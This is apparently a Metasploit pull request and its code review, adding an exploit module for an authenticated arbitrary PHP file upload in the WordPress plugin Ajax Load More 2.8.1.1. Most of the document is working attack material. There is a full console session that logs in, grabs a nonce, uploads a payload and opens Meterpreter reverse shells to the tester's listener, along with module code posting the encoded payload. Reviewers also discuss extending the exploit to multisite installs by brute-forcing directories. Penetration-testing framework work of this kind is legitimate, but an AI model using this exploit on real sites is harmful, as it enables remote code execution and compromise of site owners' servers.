### PR TITLE
Add WP Ajax Load More Plugin File Upload Vuln.

### PR DESCRIPTION
**Pull request by espreto**
#### Add WordPress Plugin Ajax Load More Auth File Upload Vulnerability

  Application: WordPress Plugin 'Ajax Load More' 2.8.1.1
  Homepage: https://wordpress.org/plugins/ajax-load-more/
  Source Code: https://downloads.wordpress.org/plugin/ajax-load-more.2.8.0.zip
  Active Installs (wordpress.org): 10,000+
  References: https://wpvulndb.com/vulnerabilities/8209
#### Vulnerable packages*

  2.8.1.1
##### Linux (Ubuntu 12.04.5 LTS):

```
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf>  use exploit/unix/webapp/wp_ajax_load_more_file_upload 
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  info

       Name: Wordpress Ajax Load More PHP Upload Vulnerability
     Module: exploit/unix/webapp/wp_ajax_load_more_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-10-10

Provided by:
  Unknown
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   Ajax Load More 2.8.1.1

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                         yes       The target address
  RPORT        80               yes       The target port
  TARGETURI    /                yes       The base path to the wordpress application
  VHOST                         no        HTTP server virtual host
  WP_PASSWORD                   yes       Valid password for the provided username
  WP_USERNAME                   yes       A valid username

Payload information:

Description:
  This module exploits an arbitrary file upload in the WordPress Ajax 
  Load More version 2.8.1.1. It allows to upload arbitrary php files 
  and get remote code execution. This module has been tested 
  successfully on WordPress Ajax Load More 2.8.0 with Wordpress 4.1.3 
  on Ubuntu 12.04/14.04 Server.

References:
  https://wpvulndb.com/vulnerabilities/8209

msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  show options 

Module options (exploit/unix/webapp/wp_ajax_load_more_file_upload):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                         yes       The target address
   RPORT        80               yes       The target port
   TARGETURI    /                yes       The base path to the wordpress application
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD                   yes       Valid password for the provided username
   WP_USERNAME                   yes       A valid username


Exploit target:

   Id  Name
   --  ----
   0   Ajax Load More 2.8.1.1


msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set RHOST 192.168.0.14
RHOST => 192.168.0.14
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set WP_USERNAME espreto
WP_USERNAME => espreto
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set WP_PASSWORD P@ssW0rd
WP_PASSWORD => P@ssW0rd
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  check 
[*] 192.168.0.14:80 - The target appears to be vulnerable.
msfdevel 192.168.0.7 shell[s]:0 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  exploit 

[*] Started reverse handler on 192.168.0.7:4444 
[*] 192.168.0.14:80 - Uploading payload
[*] 192.168.0.14:80 - Calling uploaded file
[*] Sending stage (33068 bytes) to 192.168.0.14
[*] Meterpreter session 1 opened (192.168.0.7:4444 -> 192.168.0.14:42868) at 2015-10-17 13:21:05 -0300
[+] Deleted default.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-62-generic #102~precise1-Ubuntu SMP Wed Aug 12 14:11:43 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 12445 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
Background channel 0? [y/N]  y
meterpreter > background
[*] Backgrounding session 1...
msfdevel 192.168.0.7 shell[s]:1 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  set VERBOSE true
VERBOSE => true
msfdevel 192.168.0.7 shell[s]:1 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  exploit 

[*] Started reverse handler on 192.168.0.7:4444 
[*] 192.168.0.14:80 - Trying to login as espreto
[*] 192.168.0.14:80 - Trying to get nonce
[*] 192.168.0.14:80 - Trying to upload payload
[*] 192.168.0.14:80 - Uploading payload
[*] 192.168.0.14:80 - Calling uploaded file
[*] Sending stage (33068 bytes) to 192.168.0.14
[*] Meterpreter session 2 opened (192.168.0.7:4444 -> 192.168.0.14:42935) at 2015-10-17 13:24:03 -0300
[+] Deleted default.php

meterpreter > background 
[*] Backgrounding session 2...
msfdevel 192.168.0.7 shell[s]:2 job[s]:0 msf> exploit(wp_ajax_load_more_file_upload)  
```

### CODE REVIEW

File: modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb [hunk 1]
```diff
@@ -0,0 +1,120 @@
...
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'      => 'POST',
+      'uri'         => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
+      'vars_post'   => {
+        'action'    => 'alm_save_repeater',
+        'value'     => payload.encoded,
+        'repeater'  => 'default',
+        'type'      => 'default',
```
Comment (FireFart) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: if you set type to `unlimited` the filename will be repeater_post_value.php. This way we could clean up after exploting. There is also an edge case when using a multisite blog where this exploit may not be working:
```
if($blog_id > 1){
		   $dir = ALM_UNLIMITED_PATH. 'repeaters/'. $blog_id;
	   	if( !is_dir($dir) ){
	         mkdir($dir);
	      }
```

I think we need a new core function `is_multisite` and `get_blog_id` to exploit this in multisite installations

Comment (FireFart) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: Multisite detection:
https://github.com/wpscanteam/wpscan/blob/master/lib/wpscan/wp_target/wp_registrable.rb#L33

Will have a look if there is a way to extract the blog id

Comment (FireFart) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: haven't found a way to extract the blog_id reliable. What do you think of implementing the is_multisite and trying to bruteforce the directory (try 1-10 or a user provided option) if it's a multisite?

Comment (espreto) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: @FireFart Hmmm. Good eye. I will test it (including your suggestions) this week. Tks.

File: modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb [hunk 2]
```diff
@@ -0,0 +1,120 @@
...
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => normalize_uri(wordpress_url_backend, 'admin.php'),
+      'vars_get'  => {
+        'page'    => 'ajax-load-more-repeaters'
+      },
+      'cookie'    => cookie
+    )
+
+    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: Is this json data? Would it be better to use the json parser?

File: modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb [hunk 3]
```diff
@@ -0,0 +1,120 @@
...
+    vprint_status("#{peer} - Trying to login as #{username}")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?
+
+    vprint_status("#{peer} - Trying to get nonce")
+    nonce = get_nonce(cookie)
+    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?
+
+    vprint_status("#{peer} - Trying to upload payload")
+    filename = 'default.php'
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: Can this be random?

Comment (FireFart) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: jeah you need to change another parameter for this to be random (see my previous comment)

**Comment by wchen-r7** [comment]
This module works for me.

File: modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb (hunk 2 above)
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: Disregard this comment. This is actually JavaScript.

Once #6118 is landed, you will be able to parse this type of stuff more cleanly :-)

File: modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb (hunk 1 above)
Comment (wchen-r7) [inline modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb]: I'll hold on to this pull request until this part is addressed. I'll add a delayed label here, and when you're done, ping me so I'll land it :-)

**Comment by wchen-r7** [comment]
@espreto @FireFart Can I just go ahead and land this? It looks like we have lost the momentum?

**Comment by FireFart** [comment]
sure my comments were only improvements and the module was working fine

**Comment by wchen-r7** [comment]
Ok cool
